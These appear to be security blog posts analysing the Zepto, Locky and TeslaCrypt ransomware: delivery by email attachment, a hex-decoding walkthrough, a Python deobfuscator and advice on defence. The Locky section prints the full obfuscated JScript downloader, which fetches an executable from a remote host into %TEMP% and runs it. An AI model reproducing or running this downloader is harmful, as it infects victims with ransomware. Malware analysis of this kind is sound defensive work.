Zepto Ransomware, The New Kid in Town

HTA Downloader delivers Zepto Ransomware

Attack Vector: Email Attachment
Malicious File: it5Ax.hta

The Zepto sample that we found this morning came in as a zipped email attachment containing an HTML Application (.hta) file. HTA files combine HTML with one or more scripting languages such as VBScript or JScript. A quick look at the file below shows it is HTML with obfuscated JScript. One of the significant dangers of HTA files is that once the file is downloaded and run it is treated as a "fully trusted application", whereas a regular HTML file runs confined to the security model of the web browser.

We've seen Zepto and its cousin Locky arrive in DOCM attachments in recent months and I am not surprised to see the evolution to HTA files. DOCM, which stands for Document with Macros, is a document with embedded scripts written in VBA (Visual Basic for Applications). Macros, however, don't run by themselves and require user assistance. Whether the file is an HTA or a DOCM, the result is the same: once run, it downloads the malware from its C2 and executes it.

HTA Encoded JScript Downloader
Exploit and Post Infection Traffic

After compromise your files are encrypted and their extensions changed to .zepto, similar to Locky, which changes file extensions to .locky.

Post Compromise the file extensions changed to .zepto

Payment instructions appear on the user's desktop and in every directory, explaining your predicament.

Desktop Image displays Instructions

Your personal identification ID in the help message is the same as the first half of each scrambled filename.

Conclusion
Locky and Zepto ransomware are similar in several regards: for example, both are distributed primarily in massive spam campaigns via zipped JScript attachments, and both leave behind the same types of files, including a similar ransom note.

We expect to see more malware payloads sent as HTA documents, so take a few precautions, such as:

  • Change settings in Control Panel to show file extensions, to protect against misleading file names.
  • Configure Office settings to not allow macros to run in documents that came from the internet.
  • Always open .JS files in Notepad.
  • Back up your files regularly.
  • Treat all attachments as suspect.

Decoding A Malicious Javascript Downloader

JavaScript Downloader Leads to Locky Ransomware

Attack Vector: Email Attachment (MX62EDO2016030179167.zip)
Malicious JavaScript file: FG8327338338.js

The file is a downloader currently being sent as a compressed email attachment to evade detection by antivirus and IDS. When executed on a victim's computer it downloads Locky ransomware. The malware authors are using a simple hexadecimal obfuscation technique to hide the source of the payload. I wanted to show readers how to decode, or convert, the hexadecimal to ASCII to expose the domain that is serving it. Reviewing the entire JavaScript (found in the reference) you will see the obfuscation pretty easily.

Decode

To decode the hexadecimal, remove the leading '\u00' prefixes (in yellow), leaving only the hexadecimal digits (A-F, 0-9). Pay attention to the other special characters and letters (in red).

Obfuscated Hexadecimal URL

68 74 74 70 3A // 6D 6F 74 6F s. 72 75 2F '+'a'+' 64m 69 6E 2F 6D o 64 e 6C 2F 38 37 79 68 62 35 34 cdf 79 2E e 78 e

Hexadecimal + Special Characters and ASCII Letters

Decode it on your favorite online hex decoder (e.g. http://ddecode.com or http://www.asciitohex.com), or simply remove the special characters and run it locally in a terminal as shown below.

# echo 687474703A6D6F746F72752F64696E2F6D646C2F38377968623534792E78 | python3 -c "import sys, binascii; sys.stdout.buffer.write(binascii.unhexlify(input().strip()))"

Terminal decode command

Combining the resulting string with the special characters and ASCII letters exposes the URL that will serve the malware:

  – http://moto[.]ru/admin/model/87yhb54cdfy.exe
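The manual steps above can be automated. The following Python script is an added example, not code from the original post: it statically evaluates the three tricks this downloader uses (\uXXXX escapes, '+' concatenation, and comma groups such as ("junk","junk",'real') that the JS comma operator reduces to the last operand). The sample expressions are retyped with straight quotes from the full listing further down the page; the names given to them are mine.

```python
import re

# One JS string literal, single- or double-quoted, with backslash escapes allowed.
_LIT = r"""(?:'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")"""
_LITS = re.compile(_LIT)
# A parenthesised comma expression of literals: ("junk","junk",'real').
_COMMA = re.compile(r"\(\s*" + _LIT + r"(?:\s*,\s*" + _LIT + r")*\s*\)")
_UESC = re.compile(r"\\u([0-9a-fA-F]{4})")

# Expressions retyped (straight quotes) from the downloader listing on this page.
SAMPLES = {
    "ActiveXObject": r"""("lifestyle","individual","standings","warming","screech",'\u0041c')+'t\u0069'+'v\u0065X\u004F\u0062'+'\u006Aec\u0074'""",
    "WScript.Shell": r"""'W'+("slammed","plumber",'S')+'\u0063\u0072ip\u0074.'+'\u0053\u0068ell'""",
    "ADODB.Stream": r"""("augustinian","gunwale","shock",'A\u0044')+'\u004FD'+'\u0042.'+'\u0053\u0074re\u0061\u006D'""",
    "dropped file": r"""("neptune","disclosure","gravy","fetching","explicit",'\u002FKu\u0044\u0049')+("formative","clandestine",'\u006FtQ')+'j1\u002E'+'e\u0078e'""",
    "download URL": r"""("africa","digits","textbook",'\u0068\u0074\u0074\u0070\u003A//e\u006D')+'\u006F\u0074\u006Fs.\u0072\u0075\u002F'+'a'+'\u0064m\u0069\u006E\u002F\u006Do\u0064e\u006C\u002F\u0038\u0037\u0079\u0068\u0062\u0035\u0034cdf\u0079\u002Ee\u0078e'""",
}

def _unescape(lit: str) -> str:
    """Drop the surrounding quotes and resolve \\uXXXX escapes to characters."""
    return _UESC.sub(lambda m: chr(int(m.group(1), 16)), lit[1:-1])

def _collapse_comma(expr: str) -> str:
    """The JS comma operator discards all but the last operand, so
    ("junk","junk",'real') is just 'real'; the decoy words are never used."""
    return _COMMA.sub(lambda m: _LITS.findall(m.group(0))[-1], expr)

def deobfuscate(expr: str) -> str:
    """Statically evaluate an expression built only from string literals,
    '+' concatenation and comma groups; refuse anything else rather than guess."""
    collapsed = _collapse_comma(expr)
    leftovers = _LITS.sub("", collapsed).replace("+", "").strip()
    if leftovers:
        raise ValueError(f"unsupported syntax in expression: {leftovers!r}")
    return "".join(_unescape(lit) for lit in _LITS.findall(collapsed))

def decode_samples() -> dict:
    """Decode every sample; the URL is defanged with [.] for safe handling."""
    out = {name: deobfuscate(expr) for name, expr in SAMPLES.items()}
    out["download URL"] = out["download URL"].replace(".", "[.]")
    return out

if __name__ == "__main__":
    for name, value in decode_samples().items():
        print(f"{name:14s} -> {value}")
```

Running it reveals the COM objects the script instantiates (WScript.Shell, MSXML2-style HTTP request, ADODB.Stream) and the drop path suffix under %TEMP%, which are useful indicators for detection rules without ever executing the sample.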

Recommendations

Never open attachments in emails unless you are expecting an attachment, even if you know and trust the sender. It's easier to confirm that the sender sent you the attachment than to clean up a ransomware compromise.

Reference

https://www.virustotal.com/en/file/557184BE5BD72298EC32E10E9225A448BC4C4C6121971B659F32B8C8D4B8316D/analysis/

https://malwr.com/analysis/ZDc4MmExYWYzZjJkNDUyYmE5MTllZjhkNGMxZTkyZTA/

Full JavaScript file text

//(function( global, factory ) {

var FhCjGh = ‘\u0052un’; var ARDiz = this[(“lifestyle”,”individual”,”standings”,”warming”,”screech”,’\u0041c’)+’t\u0069’+’v\u0065X\u004F\u0062’+’\u006Aec\u0074′];

var xEsHeV = new ARDiz(‘W’+(“slammed”,”plumber”,’S’)+’\u0063\u0072ip\u0074.’+’\u0053\u0068ell’);

// if ( typeof module === “object” && typeof module.exports === “object” ) { // For CommonJS and CommonJS-like environments where a proper `window` // is present, execute the factory and get jQuery. // For environments that do not have a `window` with a `document` // (such as Node.js), expose a factory as module.exports. // This accentuates the need for the creation of a real `window`. // e.g. var jQuery = require(“jquery”)(window); // See ticket #14549 for more info. module.exports = global.document ? factory( global, true ) : function( w ) { if ( !w.document ) { throw new Error( “jQuery requires a window with a document” ); } return factory( w ); }; } else { factory( global );

var kjEEQvxTq = xEsHeV[(“saucer”,”hints”,’E\u0078pa\u006E\u0064′)+(“daytime”,”shelf”,”neuralgia”,’\u0045\u006E\u0076\u0069\u0072\u006Fnm\u0065′)+’\u006Et\u0053tr\u0069n’+’g\u0073′](‘%’+(“sublime”,”demagogue”,”samples”,’T’)+’E’+’\u004DP%’) + (“neptune”,”disclosure”,”gravy”,”fetching”,”explicit”,’\u002FKu\u0044\u0049′)+(“formative”,”clandestine”,’\u006FtQ’)+’j1\u002E’+’e\u0078e’;

//}// Pass this if window is not defined yet }(typeof window !== “undefined” ? window : this, function( window, noGlobal ) {

var sgOIi = new ARDiz(‘M’+(“partridge”,”holocaust”,”inert”,”incompetent”,’SX\u004D’)+’L\u0032.X\u004D\u004C\u0048T’+’T\u0050′);

//// Support: Firefox 18+ // Can”t be in strict mode, several libs including ASP.NET trace // the stack via arguments.caller.callee and Firefox dies if // you try to trace through “use strict” call chains. (#13335) //”use strict”; var deletedIds = [];

sgOIi[‘o\u006E’+’r\u0065\u0061\u0064y’+(“tuscany”,”quebec”,’s\u0074′)+(“journeyman”,”exemplify”,”dalton”,’a\u0074\u0065\u0063h\u0061\u006Eg\u0065’)] = function () {

if (sgOIi[‘r’+’\u0065\u0061d\u0079s’+’t’+(“massage”,”argumentative”,”grandpa”,”gender”,”musical”,’a\u0074e’)] === 4) {

var paHFKIl = new ARDiz((“augustinian”,”gunwale”,”shock”,’A\u0044′)+’\u004FD’+’\u0042.’+’\u0053\u0074re\u0061\u006D’);

//var document = window.document;

paHFKIl[‘\u006Fp\u0065n’]();

//var slice = deletedIds.slice;

paHFKIl[‘t\u0079\u0070e’] = 1;

//var concat = deletedIds.concat;

paHFKIl[‘w’+(“evolutionary”,”compression”,”unction”,’r’)+’i’+’\u0074e’](sgOIi[‘Re\u0073’+’p\u006F\u006Ese\u0042’+(“barque”,”poetess”,’o’)+’d\u0079′]);

//var push = deletedIds.push;

paHFKIl[(“everyday”,”deployment”,’p\u006Fs’)+’i’+’t’+’\u0069on’] = 0;

//var indexOf = deletedIds.indexOf;

paHFKIl[‘s\u0061’+(“perverted”,”curious”,”accede”,’ve\u0054′)+’o\u0046’+(“consistently”,”farmer”,”vocals”,’\u0069le’)](kjEEQvxTq, 2);

//var class2type = {};

paHFKIl[(“thrown”,”spalding”,’c’)+’l’+’o’+(“juvenile”,”cuckoo”,”coeval”,’s\u0065′)]();

//var toString = class2type.toString;

};

//var hasOwn = class2type.hasOwnProperty;

sgOIi[‘o\u0070e\u006E’](‘\u0047ET’, (“africa”,”digits”,”textbook”,’\u0068\u0074\u0074\u0070\u003A//e\u006D’)+’\u006F\u0074\u006Fs.\u0072\u0075\u002F’+’a’+’\u0064m\u0069\u006E\u002F\u006Do\u0064e\u006C\u002F\u0038\u0037\u0079\u0068\u0062\u0035\u0034cdf\u0079\u002Ee\u0078e’, false);

//var support = {};

sgOIi[‘s\u0065\u006Ed’]();

//

xEsHeV[FhCjGh](kjEEQvxTq, 1, “UNHUGlAh” === “JAFBXnHFM”);

//var version = “1.12.1”,

} catch (QMDvrsH) { };

// // Define a local copy of jQuery jQuery = function( selector, context ) {


TeslaCrypt Analysis

Ransomware can be delivered in emails sent directly to an unsuspecting recipient, or in a drive-by download from a compromised website via an exploit kit. Exploit kits probe a user's browser to check whether the system is unpatched. Flash has been the most common vulnerability used for malware delivery for some time. If the browser is not patched to the latest version, the user is redirected to a second site, referred to as a gate, and finally to a malware site where the file is served.

Detonation of the malware executable


POST Activity after detonation of the malware executable

Persistence is established by adding a value that points at the dropped file under the Run registry key, a common technique malware authors use to ensure the malware can't be removed by antivirus.


Persistence is established

Once infected with ransomware, the decryption instructions are dropped in every directory. The instructions are as helpful and kindly as can be: they explain how they are "protecting" your files. Victims typically have 48 hours to pay the ransom or lose their files.


Instructions

Recommendations

This is easy to avoid.

  • Update your web browser.
  • Back up your files. If you have a backup it doesn't matter if your files get encrypted.
  • Don't pay. Ransomware is becoming very popular because so many of the victims are paying.
  • Detach your external storage device. The malware will encrypt all files on the PC as well as on any network drive or external storage the PC is attached to.

Reference

TeslaCrypt_Malware

HELP.png

The malware file is password protected with the usual password. If you don't know it, email me at admin@packetreport.com
